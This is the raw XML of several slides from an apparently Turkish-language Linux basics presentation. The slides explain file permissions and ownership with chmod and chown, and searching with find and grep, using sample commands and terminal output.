            <a:ext cx="9144000" cy="3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https://contabo.com/blog/a-practical-guide-to-superuser-accounts-sudo-root/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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81" name="Shape 281"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p3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izin değiştirme komutu: chmod</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="41346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200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod u=rwx,g=rwx,o=rwx directory-name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="1284000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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komut, belirtilen dosyayı veya dizinin izinlerini değiştirir.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chmod u=rw,go= belge.txt </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chmod 600 belge.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="2031625"/>
            <a:ext cx="4488600" cy="2668476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p3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https://linuxopsys.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.freecodecamp.org/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="Google Shape;287;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3316" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115401" cy="1711950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="434343"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="3024226"/>
            <a:ext cx="4115400" cy="17119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2" name="Shape 292"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p3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sahibi ve grubunu değiştirme komutu: chown</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p39"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ chown -R yeni_user /path/to/dizin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p39"/>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komut, dosya ve dizinlerin sahibini değiştirmek için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K</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>omutunu kullanabilmek için genellikle dosyanın veya dizinin sahibi olmanız veya uygun izinlere sahip olmanız gerekmektedir.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Parametreleri:</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-R: Alt dizinlerin grubunu da değiştirir.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Kullanıcı ve Grubu Değiştirmek:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chown yeni_kullanici:yeni_grup belge.txt</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Sadece Grubu Değiştirmek:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chown :yeni_grup dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1202250"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ls -l</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1773775"/>
            <a:ext cx="4115400" cy="27951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50">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>total</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12</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00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>drwxr-xr-x</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2</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user</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user</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4096 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Jan</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9</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14</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:00</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dizin1</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50">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>drwxr-xr-x</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2</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nuser</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nuser</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4096 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Jan</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9</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:01</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dizin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="105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1" name="Shape 301"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p40"/>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Sistemde dosya arama komutu: find</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3496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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/home/user/Documents/example.txt</a:t>
            </a:r>
            <a:endParaRPr b="1"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/home/user/Desktop/test.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/home/user/Downloads/report.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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1200">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p40"/>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find /home -name "*.txt"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="40344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Belirtilen bir dizinde ve alt dizinlerinde arama yapar. Sonuçlar, kriterlere göre filtrelenir ve ekrana yazdırılır.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Parametreleri:</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-name: isme göre filtreler</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-user: kullanıcıya göre filtreler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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Dosya uzantısı .conf olan dosyaları ara</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find /etc/ -name *.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1450">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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*conf ile biten dizinleri ara</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-320675" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1450"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find /etc/ -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="E9950C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> d -name *conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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9" name="Shape 309"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p41"/>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Dosya içinde arama komutu: grep</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1280050"/>
            <a:ext cx="4115400" cy="3376500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="999999"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dosya</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1.txt:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:ara_kelime içeren bir satır</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="105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50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dosya2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:ara_kelime içeren bir başka satır</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
